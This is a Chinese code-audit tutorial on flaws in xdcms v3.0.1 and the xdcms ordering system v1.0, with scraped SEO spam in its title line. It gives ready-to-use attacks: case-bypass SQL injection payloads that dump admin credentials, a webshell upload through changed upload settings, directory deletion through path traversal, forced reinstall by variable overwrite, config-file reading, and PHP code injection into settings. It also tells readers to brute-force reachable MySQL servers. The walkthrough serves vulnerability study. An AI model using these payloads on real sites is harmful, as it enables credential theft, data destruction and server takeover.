郑州平台网站建设,企业网站html5,建站技巧,珠海事件最新进展目录
xdcms v3.0.1漏洞
环境搭建
代码审计
目录总览
配置文件总览
登陆处sql注入
漏洞分析
漏洞复现
注册处sql注入漏洞
漏洞分析
漏洞复现
getshell
任意文件删除
xdcms订餐网站管理系统v1.0漏洞
简介
环境搭建
全局变量的覆盖
漏洞分析
漏洞复现
后台任意…目录
xdcms v3.0.1漏洞
环境搭建
代码审计
目录总览
配置文件总览
登陆处sql注入
漏洞分析
漏洞复现
注册处sql注入漏洞
漏洞分析
漏洞复现
getshell
任意文件删除
xdcms订餐网站管理系统v1.0漏洞
简介
环境搭建
全局变量的覆盖
漏洞分析
漏洞复现
后台任意源码读取
后台getshell
漏洞分析
漏洞复现 xdcms v3.0.1漏洞
环境搭建
1.xdcms_3.0.1 源码放到WWW目录下面。 源码下载地址: 链接https://pan.baidu.com/s/1JDRfeyPbbpF5br9t6pcNSw 提取码zkaq 2.安装访问( http://127.0.0.1/xdcms_v3.0.1/install/index.php 一路选择下一步直到设置页面创建数据库……安装完成。 输入数据库账号密码可以选择新建个数据库 xdcms 不新建也可以输入数据库的名称即可点击进行下一步进行网站简单的设置 可以看到安装成功请牢记您的管理员账户:xdcms , 密码 xdcms进入后台管理。 代码审计
目录总览
首先可以拿出来 代码审计工具—Seay源代码审计系统进行自动审计先看一下哪里容易出问题从而可以不那么盲目。 发现 xdcms 的目录很简单包括后台 admin cache data 系统system 上传uploadfile。自动扫描出了171个可疑漏洞。 这里目录并不是很复杂也没有采用thinkphp的框架自己搭建的框架因此代码还是很容易读懂的 首先看到目录先要找数据库文件是不是存在默认的下载路径如果通过这种方法我们就能直接拿到管理员账号密码那后续就不需要审计什么了。 这里没有什么默认的mdb文件或是sql文件backup里也为空因此唯一可能有用的就是config.inc.php文件但是因为是php肯定是不显示的因此这里不存在此类漏洞。 下面我们可以猜测admin肯定是管理员目录cache为缓存估计也没什么用。。 install为安装目录经常出现的就是任意文件删除漏洞然后利用这种漏洞删除install目录下的lock文件导致cms可以进行重装。 system目录应该就是整个网站的组成文件这个文件夹应该是审计的重点 最后是一个上传文件的目录这个看看有没有任意文件上传漏洞吧。
配置文件总览
下面先看看有哪些配置文件哪些文件经常引用到这类文件往往会贯穿整个网站构建过程一些重要的过滤函数也一般在这类文件中。
这是index.php文件我们可以看到两个配置文件下面逐步跟着这些配置文件进行审计。 ?phpif(!file_exists(data/config.inc.php)){header(location:install/index.php);exit();}require dirname(__FILE__)./system/common.inc.php;?
进入config.inc.php文件主要是数据库配置信息。会看到用的是utf-8字符因此不存在宽字节注入。 进入system/common.inc.php文件应该是整个网站的构架文件可以看到之前说的system目录为系统目录另外我们需要注意在最下面一行又引用了一个fun.inc.php文件应该是function的配置文件这类文件往往就是过滤函数的聚集地。 继续仔细看看fun.inc.php文件。这是fun.inc.php的一部分可以看到这里有两个过滤函数一个应该是xss过滤一个是sql过滤。但是这里sql过滤只匹配了小写因此我们可以利用大小写来进行绕过。因此如果使用了这个safe_html()函数并且进入了数据库查询那么这里就一定存在sql注入。 登陆处sql注入
漏洞分析
全局搜索safe_html,很多地方都调用了 但不是所以都存在注入因为有些地方存在safe_replace与invtal的保护index.php?mmemberflogin_save 没办法绕过且xdcms会员管理界面但是我们暂时不能利用因为实际我们不知道管理后台账号 member会员界面单引号包裹且传参只经过safe_html过滤..且开启了报错提示,那就可用报错注入可以利用报错注入只要是只将safe_html带入数据库的查询则存在注入这样就能查询出admin表里面的管理员信息。
/system/module/member/index 上面的程序也不是很难读可以看到POST接收过来登录的账号密码然后通过 safe_html() 函数 进行过滤判断是否为空进而在103行直接带入数据库查询。这里仅仅通过 safe_html() 函数进行了过滤所以很显然是存在注入的。
漏洞复现
payload
usernamebestorangeor updatexml(1,concat(0x7e,(selEct concat(username,0x23,password) frOm c_admin),0x7e),1) #passwordbestorangesubmit%E7%99%BB%E5%BD%95 注册处sql注入漏洞
漏洞分析
现在先熟悉一下流程可以看到能够进行注册登录。 那就注册一个账号orange密码orange。 上面看到密码是进行了两次md5加密接下来看一下代码。 /system/modules/member/index.php 上面的代码很容易读懂函数是register_save()注册保存。首先POST接收传过来的参数判断是不是为空。 66行密码进行两次md5加密可以看到并没有进行明显的过滤但是在50行和72行看到了过滤函数safe_html()下面就开始追踪一下这个函数。 function safe_html($str){if(empty($str)){return;}$strpreg_replace(/select|insert | update | and | in | on | left | joins | delete |\%|\|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file|outfile/,,$str);return htmlspecialchars($str);}
分析一下这个过滤函数只是简单的把上面看到的 select insertupdate 等等替换成了空。 在 safe_html 处虽然过了个SQL注入的敏感词还过滤了和但是没有考虑SQL注入敏感词的大小写这里只过滤了小写那么我们用大写绕过这里过滤的和我们可以使用不带*和的常规保存SQL注入语句。
漏洞复现
这里利用报错注入来进行测试bestorange’ or updatexml(1,concat(0x7e,(selEct concat(username,0x23,password) frOm c_admin),0x7e),1) #passwordbestorange
payload
usernamebestorange or updatexml(1,concat(0x7e,(selEct concat(username,0x23,password) frOm c_admin),0x7e),1) #passwordbestorangepassword2bestorangefields%5Btruename%5Dbestorangefields%5Bemail%5Dbestorangesubmit%E6%B3%A8%E5%86%8C getshell
跟着uploadfile文件夹寻找文件上传点对上传文件后缀进行了限制。 利用admin后台限制的文件格式更改即可上传木马getshell也可利用上传文件后进行修改后缀。system/function/upload.inc.php文中有多个文件上传的点
通过上面注入得到的管理员的账号密码登录后台成功进入后台管理系统在 系统设置—网站配置—上传设置—文件/图片上传格式限制。 添加php文件类型然后进行上传即可。 任意文件删除
全局搜file_get_contents意外收获了unlink任意目录文件删除index.php?mxdcmscdatafdeletefile../../test
public function delete(){$filetrim($_GET[file]);$dirDATA_PATH.backup/.$file;if(is_dir($dir)){//删除文件夹中的文件if (false ! ($handle opendir ( $dir ))) {while ( false ! ($file readdir ( $handle )) ) {if ($file ! . $file ! ..strpos($file,.)) {unlink($dir./.$file);}}closedir ( $handle );}rmdir($dir);//删除目录}showmsg(C(success),-1);}
这传入的参数没有过滤也没有白名单直接拼接进dir要想触发循环就得进行if判断所以这里只能是../进行目录遍历可控进行任意文件夹删除。
xdcms订餐网站管理系统v1.0漏洞
简介
XDcms订餐网站管理系统主要使用PhpMysqlSmarty技术基础进行开发采用OOP面向对象方式进行基础运行框架搭建集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整合等功能于一体的完全开源的高级订餐网站管理系统。作为国内最受欢迎的PHP类订餐网站系统之一XDcms在不断提升用户服务、提高产品质量的同时更加注重用户体验。从系统研发至今历经了数百次的更新修改后网站的架设与管理变得更加轻松及便捷。
环境搭建 全局变量的覆盖
漏洞分析
/ install/index.php 代码的意思是把传入的变量数组遍历赋值,比如 $_GET[‘a’] 赋值为 $a。
传入一个insLockfile判断是否存在。问题在这 将直接跳过判断进行安装。 此时安装的sql数据库文件会记录在 /data/config.inc.php 利用poc:找到可外连的 mysql (自己去爆破)
漏洞复现
直接访问此地址
http://127.0.0.1/xdcms_dc_v1.0/install/index.php?insLockfile1step4dbhostlocalhostdbnamexdcmsdbuserrootdbpwd123456dbprec_dblanggbkadminuserxdcmsadminpwdxdcms 后台任意源码读取
漏洞文件:system\modules\xdcms\template.php 在xdcms 目录下看到 template 文件,目测是后台模板编辑。所以首先登陆后台登陆 http://127.0.0.1/xdcms_dc_v1.0/index.php?mxdcmsctemplate 访问 http://127.0.0.1/xdcms_dc_v1.0/index.php?mxdcmsctemplatefeditfile../../../data/config.inc.php 后台getshell
漏洞分析
/ system/modules/xdcms/ setting.php 又是用foreach来数组遍历附值。这里的$info[‘siteurl’]是没有经过处理就直接写进来了。
漏洞复现
访问/index.php?mxdcmscsetting 测试我就只加了这个phpinfo poc
);??php phpinfo();?http://127.0.0.1/
http://127.0.0.1/xdcms_dc_v1.0/index.php?mxdcmscsetting# 申明本公众号所分享内容仅用于网络安全技术讨论切勿用于违法途径 所有渗透都需获取授权违者后果自行承担与本号及作者无关请谨记守法. 没看够~欢迎关注 免费领取安全学习资料包 渗透工具 技术文档、书籍 面试题 帮助你在面试中脱颖而出 视频 基础到进阶 环境搭建、HTMLPHPMySQL基础学习信息收集SQL注入,XSSCSRF暴力破解等等 应急响应笔记 学习路线
